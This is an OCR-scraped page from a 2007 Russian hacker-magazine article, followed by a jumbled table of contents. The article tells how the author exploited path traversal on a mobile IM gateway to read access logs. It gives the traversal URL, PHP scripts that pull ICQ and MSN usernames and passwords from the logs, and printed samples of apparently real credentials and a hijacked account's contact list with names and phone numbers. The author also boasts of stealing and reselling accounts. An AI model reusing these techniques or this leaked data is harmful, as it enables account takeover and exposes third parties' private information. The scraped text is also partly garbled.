ÃÂœÃÂ°ÃÂ¹ - Xakep Online

More documents

Recommendations

Info

взлом Msn-аккаунты IM-пейджер в WAP Затем я отыскал директорию с логами: http://wap.tjat.com/?lang=ru /../../../../../../../../../../ ../../.. /usr/local/apache/logs/temp. tjat.comaccess_log&&dira=./../../logs Мое внимание сразу привлек лог total_tjat. com-access_log, весил он немало — аж 1981336,5 Кб. Обычными средствами php открыть его было невозможно. Не особо расстроившись, я немного погуглил на эту тему и написал небольшой скриптик, позволяющий открывать такие большие файлы: Загрузив часть лога, я изучил его структуру и изменил свою функцию так, чтобы она выводила только асечные номера и пароли: function bigfile($filename) { $fd = fopen($filename, "r"); while (!feof($fd)) { $buffer = fgets($fd, 20*4096); preg_match_all('/ icq_uin=([0-9]{5,9})&icq_ pwd=(.*)(&|HTTP)/i', $buffer,$matches); $matches[0] = array_ unique($matches[0]); !empty($matches[0][0]) ? print $matches[0][0]."\n" : ''; fclose($fd); } } В результате браузер выдал мне кучу неупорядоченной информации, содержащую пароли и номера. Теперь их надо было как-то очистить от лишнего мусора и систематизировать. Для этого я снова применил свои кодерские способности и написал простенький парсер, который выводил мне упорядоченный список без повторов в формате uin;password и общее количество всех номеров: Затем я запустил свое творение у себя на локалхосте, вбил туда хаотичный список с tjat.com и выполнил, получив в итоге список уинов и паролей (привожу небольшой кусочек тут, да простят меня владельцы этих номеров): 204685805;tatyshka 204755617;120681 204767779;gn1260 204845253;maximko 204876333;12345678 204968096;1q2a3z 205032105;049989350 205191731;asdfgh Приведенные здесь уины я не тронул, впрочем, как и остальные семи-, восьми- и девятизнаки, а на всех полученных шестизнаках с помощью товарища DarkFull'а были изменены пароли. Так что, если будет нужен короткий номерок, обращайся :). Развязка Итак, tjat.com предоставляет доступ не только к ICQ, но и к msn, причем в логах msn’овских аккаунтов раза в 3 больше, чем асечных. Я подумал, а почему бы не составить список тех же hotmail’овских / 088 xàêåð 05 /101/ 07
взлом Номерки Содержимое /etc/passwd мыл, чтобы потом их пробить по базе primary-mail 6dig уинов? Принявшись за дело, сначала я изменил первую функцию так, чтобы скрипт показывал мне логи не аськи, а msn-аккаунтов: preg_match_all('/ msn_account=(.*)&msn_ pwd=(.*)(&|HTTP)/ i',$buffer,$matches3); $matches[0]=array_ unique($matches[0]); !empty($matches[0][0]) ? print $matches[0][0]."\n" : ''; А в парсере я подправил следующее: $s=preg_replace("/msn_ account=(.*)&msn_pwd=(.*)( |HTTP)/i","$1;$2",$s); В итоге получился красивый списочек мыл, из которых на тысячу 5-8 стабильно были primary к какому-нибудь шестизнаку. Привожу тут небольшой списочек (теперь пускай меня прощают владельцы этих мыл :)). Jadallaf@hotmail.Com;farouk1975 cutemalik9@hotmail.com;456321 Devil.Matrix@hotmail.Com; 2081988 Crno_slatko_pile@hotmail.com; 901901 M3assal_teffehten@hotmail.сom; charbel Про то, как я писал скрипты, которые сравнивают базы примаков и мои логи, рассказывать не буду, так как это отдельная и очень печальная история :). Эпилог Отыскав эту багу, я получил очень и очень много элитных уинов: шох, зеркал, xy и т.д. На одном из них (xxyxxx) сижу до сих пор :). А чтобы ты, дорогой читатель, возрадовался, открою тебе небольшой секрет. Сервис tjat.com очень любят асечные админы, я уводил такие их номерки, как: xàêåð 05 /101/ 07 / 23673 59000 55444 35555 С 23673 даже произошла очень веселая история: другие номерки админы забирали максимум через день, а этот я привязал к Рамблер-ICQ и при любой попытке админа забрать его обратно возвращал его себе :). Это продолжалось около месяца, пока админ не додумался убить в базе аськи значение с привязкой этого номера. На сладкое приведу здесь кусочек контактлиста 35555: ICQ;10008;Orey Gil-yam;;+972 (52) 4872322 SMS;Fri Sep 23 2005 11:08:38 ICQ;10009;Tomer;;;Sun Sep 25 2005 13:00:09 ICQ;11221;Liat -Mrkt;;;Thu Mar 30 2006 13:28:59 General;65656;Eitan Shay;;+972 (55) 766582.;Fri Feb 10 2006 08:54:58 General;7050324;Clarisse;;;Fri Feb 10 2006 08:53:53 General;77770;Benny;;;Fri Feb 10 2006 08:53:54 Friends;56666;Dan Rogachevsky;;+972 (50) 3089999;Fri Feb 10 2006 08:54:58 Cellcom;55155;Ran — Cellcom;;;Fri Feb 10 2006 08:54:58 Bell Mobility;1028176;Eric Corbeil;;;Thu Dec 23 2004 13:31:59 Bell Mobility;62381992;Mellie Chow;;;Fri Feb 10 2006 08:54:59 BigMir Ukrine;141222364;... Yaroslav...;;;Mon Jul 24 2006 13:04:57 AOL Ops;20702012;Patrick;;;Thu Dec 23 2004 13:30:55 AOL Ops;54662;ICQ NOC;;;Fri Feb 10 2006 08:54:58 AOL Ops;71173;kate;;;Fri Feb 10 2006 08:53:53 Небольшое примечание: 10008 — самый главный человек в аське, так что звони ему и пиши sms :). З.Ы. После благополучного использования баги в течение пяти месяцев во мне взыграла жадность, и я решил продать ее. Поместил объявление на асечке, прошел гаранта, и тут знающие люди начали копать… В итоге все узнали про бажный сервис и некоторые чуть не докопались до сути. Поняв, что с меня хватит такого геморроя, я написал эту статью и сообщил о баге администраторам сервиса, которые ее благополучно и прикрыли. Кстати, после публикации на асечке реакция админов последовала незамедлительно — у себя на форуме они написали, что tjat.com не ведет никаких логов, им очень жаль людей, которые потеряли номерки, но админы и их сервис ни в чем не виноваты: Tjat system NOT storing any UIN passwords (The validation process is not with Tjat at all (Icq.com), so we dont need that information), the passwords stored on your mobile device himself, as a part of the RememberMe feature. Please consider that when using any RememberMe feature on cellular phones at all DONT give your mobile to others, or remove these links/cookies first, they can use it for abuse!!! Охотно им поверим и закончим на этом :). Пользуясь случаем, передаю спасибо за моральную поддержку Cash, [De1eT], F100D P0w3R, DarkFull, Zahareg, всем, кто принимал участие в развитии этой истории на асечке и злом, а также админам tjat.com за то, что они все же прочитали мой мейл и приняли меры по устранению уязвимости :).z 089
Page 1:
МАй 05(101) 2007 22 секрет
Page 4 and 5:
meganewS 004 MegAneWS Все нов
Page 6:
meganews Дмитрий Трави
Page 10:
meganews Гибридим теле
Page 14:
meganews Уникальное пр
Page 17 and 18:
meganews Макинтоши тож
Page 19 and 20:
476 $140 $195 >> ferrum mSi nx7600g
Page 21 and 22:
S T T I C H T Y U B B E S T B U Y B
Page 24 and 25:
ferrum $45 $85 razer deathadder К
Page 26 and 27:
pc_zone кРис кАспеРски
Page 28 and 29:
pc_zone DVD На диске теб
Page 30:
pc_zone Пересчет CRC В з
Page 33 and 34:
pc_zone секрета Google По
Page 35 and 36:
pc_zone http:// Многочисл
Page 37 and 38:
pc_zone Несколько борд
Page 39 and 40: pc_zone FAR хранит списо
Page 41 and 42: pc_zone Папка Recent хран
Page 43 and 44: implant Готовый височн
Page 45 and 46: implant Нервы височной
Page 48 and 49: implant Дейтерий трити
Page 50 and 51: implant Германский ток
Page 52 and 53: implant компенсируетс
Page 54 and 55: взлом кРис кАспеРс
Page 56 and 57: взлом ANI-формат: уда
Page 58 and 59: взлом анимированны
Page 60 and 61: взлом M3lC1Y / m3lc1y@bk.ru, h
Page 62: взлом i Пользуясь с
Page 65 and 66: взлом var sock = new java.net.
Page 67 and 68: взлом Внешний вид п
Page 69 and 70: взлом Настройки Googl
Page 72 and 73: взлом леониД «R0id» с
Page 74: взлом ! Внимание! Ин
Page 77 and 78: взлом Хэши админск
Page 79 and 80: взлом Бажный ресур
Page 81 and 82: взлом Возможности
Page 83 and 84: взлом Пример: «select"u
Page 85 and 86: взлом «Три девицы п
Page 88 and 89: взлом Маг / mag@wapp.ru / I
Page 92 and 93: взлом леониД «CR@WleR»
Page 94 and 95: взлом DVD На нашем DVD
Page 96 and 97: взлом Леонид «R0id» С
Page 98 and 99: сцена Мария «Mifrill»
Page 100: сцена 10240-процессор
Page 103 and 104: сцена DVD Команда HITB'
Page 105 and 106: сцена Хакер - офици
Page 108 and 109: сцена ильЯ АлексАн
Page 110 and 111: unixoid Сергей «grinder» Я
Page 112 and 113: unixoid Установка новы
Page 114 and 115: unixoid Крис Касперски
Page 116 and 117: unixoid Консольная вер
Page 118 and 119: unixoid Linux в гостях у Fr
Page 120 and 121: unixoid i Для тех отваж
Page 122 and 123: coding АнДРей «littleBUddA»
Page 124 and 125: coding Несколько слов
Page 126 and 127: coding Deeoni$ / DeeoniS@gmail.com
Page 128 and 129: coding RegMon показывает,
Page 130 and 131: coding боРис вольфсон
Page 132 and 133: coding Вот так будет в
Page 134 and 135: coding Крис Касперски
Page 136 and 137: креатиff meganews /134
Page 138 and 139: креатиff meganews расте
Page 140 and 141:
units сТепАн «Step» иль
Page 142:
РЕДАКЦИОННАЯ ПОДПИ
Page 145 and 146:
units magazine@real.xakep.ru не
Page 147 and 148:
Íàäåæíûé ñòîðîæåâî
Page 149 and 150:
ХАКЕР.PRO Настройки
Page 151 and 152:
ХАКЕР.PRO Выбор типа
Page 153 and 154:
ХАКЕР.PRO Синхрониза
Page 155 and 156:
ХАКЕР.PRO на. Его рек
Page 157 and 158:
ХАКЕР.PRO Использова
Page 159 and 160:
ХАКЕР.PRO Активные с
Page 161 and 162:
ХАКЕР.PRO Внутри дом
Page 165:
2007 x 05(МАЙ)101 101
show all

ÃÂœÃÂ°ÃÂ¹ - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

ÃÂœÃÂ°ÃÂ¹ - Xakep Online